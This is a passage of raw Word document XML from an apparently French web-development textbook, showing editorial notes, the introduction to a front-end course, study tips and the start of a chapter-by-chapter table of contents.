          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="187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Note</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="204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Gris</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="510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Précision, contexte, nuance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Numérotation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les chapitres sont numérotés de 1 à 93 à l'échelle du volume : le cours 1 occupe les chapitres 1 à 45, le cours 2 les chapitres 46 à 93. Les figures, tableaux et listings sont numérotés par chapitre (par exemple figure 18.4). Les exercices et corrigés suivent la même règle (exercice 18.2, corrigé 18.2).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Exactitude et versions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les exemples privilégient les standards stables : HTML5 vivant, CSS niveau 3 et modules récents largement pris en charge, JavaScript ECMAScript 2020 et ultérieur, Bash, Docker, Kubernetes, Terraform, Ansible. Lorsqu'une fonctionnalité dépend d'une version, le texte le signale. En cas de doute, la documentation officielle fait foi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Sources</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les deux ressources fournies par l'éditeur sont citées dans les mentions légales. Les autres informations techniques proviennent des spécifications et documentations publiques (WHATWG, W3C, MDN, OpenJS Foundation, Linux Foundation, CNCF, éditeurs cloud). Aucun contenu protégé n'a été reproduit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Signalement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les erreurs, ambiguïtés et suggestions peuvent être adressées à l'éditeur via le site https://espritropic.rf.gd, en précisant la page, le numéro de chapitre et la section concernée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId10"/>
          <w:footerReference w:type="default" r:id="rId11"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1474" w:right="1361" w:bottom="1361" w:left="1531" w:header="709" w:footer="652" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SurTitre"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="18"/>
          <w:spacing w:val="60"/>
        </w:rPr>
        <w:t>COURS 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TitreCours"/>
      </w:pPr>
      <w:r>
        <w:t>Développement web front-end</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Construire des interfaces web modernes, accessibles et performantes, avec les standards du Web.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="2" w:color="E0A21B"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Ce cours part d'une page blanche. Il suppose seulement que vous savez utiliser un ordinateur, un clavier et un navigateur. À la fin, vous aurez construit un site complet, versionné, optimisé et publié.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La progression suit celle d'un projet réel : on commence par comprendre comment le Web fonctionne, puis on écrit du HTML sémantique, on met en forme avec CSS, on compose des mises en page responsive, on ajoute de l'interactivité en JavaScript, avant de traiter la qualité, la performance, la sécurité et la mise en ligne.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Chaque chapitre combine explications, schémas, tableaux de synthèse et exemples exécutables. Les exercices sont corrigés pas à pas et les quiz permettent de vérifier les acquis avant de continuer.</w:t>
      </w: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CE QUE CONTIENT CE COURS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>45 chapitres progressifs, du premier fichier HTML aux listes de données.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Plus de 180 exemples de code commentés et directement réutilisables.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Des tableaux de synthèse pour les balises, les propriétés CSS et les API JavaScript.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Des exercices corrigés et des quiz à la fin de chaque chapitre.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Un projet guidé de bout en bout au dernier chapitre.</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COMMENT TRAVAILLER CE COURS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Travaillez avec un éditeur de texte et un navigateur ouverts en permanence.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Recopiez chaque exemple au clavier : ne copiez-collez pas les premières semaines.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Faites les exercices avant de lire les corrigés, même de manière incomplète.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Après chaque chapitre, reformulez à voix haute ce que vous avez appris.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Versionnez votre travail dès le chapitre 35, puis à chaque séance.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TitreHorsSommaire"/>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Sommaire détaillé du cours</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les pages indiquées renvoient à la pagination continue du volume. Chaque chapitre peut être travaillé indépendamment, dans l'ordre proposé ou selon les besoins du lecteur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Partie I — Les fondations du Web</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>1. Comment fonctionne le Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>24</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>1.1 Le Web n'est pas Internet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>25</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>1.2 Ce qui se passe quand vous ouvrez une page</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>26</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>1.3 Les trois langages du front-end</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>27</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>1.4 Client et serveur : qui fait quoi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>28</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>1.5 Préparer son environnement de travail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>29</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>1.6 Servir une page en local</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>30</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>1.7 Ce que vous allez apprendre, et dans quel ordre</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>31</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>2. Installer et maîtriser son environnement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>36</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>2.1 L'éditeur de code : un instrument, pas un accessoire</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>36</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>2.2 Les outils du navigateur</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>37</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>2.3 Le terminal, allié du développeur web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>38</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>2.4 Organiser le dossier de travail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>39</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>2.5 Versionner dès le premier fichier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>40</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>2.6 Valider son HTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>40</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>2.7 Un environnement reproductible</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>41</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>3. La structure d'un document HTML5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>46</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>3.1 Anatomie d'un document</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>46</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>3.2 Le doctype et le mode d'affichage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>47</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>3.3 L'élément html et la langue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>47</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>3.4 L'en-tête : ce que l'utilisateur ne voit pas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>47</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>3.5 Charger les ressources sans bloquer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>49</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
